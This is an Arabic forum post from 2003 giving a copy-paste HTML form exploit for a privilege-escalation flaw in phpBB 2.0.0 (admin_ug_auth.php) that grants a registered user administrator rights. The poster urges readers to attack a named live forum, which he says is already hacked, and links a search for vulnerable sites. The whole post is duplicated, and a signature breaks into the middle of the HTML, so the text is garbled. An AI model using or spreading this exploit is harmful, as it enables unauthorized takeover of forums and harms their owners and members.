أبو خالد
05-02-2003, 03:47
كيفكم شباا ب طيبين انشاء الله اليوم موضوعنا عن اختراق المنتدايات
phpbb 2.0.0
وهو شبيه بالـvb
وهو سهل جدا بل يعتبر تااافه
يالله سمو بالله
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
تحياتي
أبو خالد
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك
وسلاااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله الا وعليه تطبيق
شووفوو المنتدا ذا
http://forums.xos.ca
اخترقوه
super linex
veto
وانا ما عملت شي غير كتبت الموضوع
ولعبت وخبصت في المنتدا وبس
مع تحياتي
وانشاء الله تكونو استفدتو اخوكم
وهذي مواقع أجنبية تعمل على هذا الاصدرا
من هناااااااااااااااااا بس لا تجرب على اي منتدى عربي (http://www.google.com/search?hl=ar&ie=UTF-8&oe=UTF-8&q=+by+phpbb+2.0.0&btnG=%D8%A8%D8%AD%D8%AB+Google&lr=) |4|
phpbb 2.0.0
وهو شبيه بالـvb
وهو سهل جدا بل يعتبر تااافه
يالله سمو بالله
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
تحياتي
أبو خالد
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك
وسلاااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله الا وعليه تطبيق
شووفوو المنتدا ذا
http://forums.xos.ca
اخترقوه
super linex
veto
وانا ما عملت شي غير كتبت الموضوع
ولعبت وخبصت في المنتدا وبس
مع تحياتي
وانشاء الله تكونو استفدتو اخوكم
وهذي مواقع أجنبية تعمل على هذا الاصدرا
من هناااااااااااااااااا بس لا تجرب على اي منتدى عربي (http://www.google.com/search?hl=ar&ie=UTF-8&oe=UTF-8&q=+by+phpbb+2.0.0&btnG=%D8%A8%D8%AD%D8%AB+Google&lr=) |4|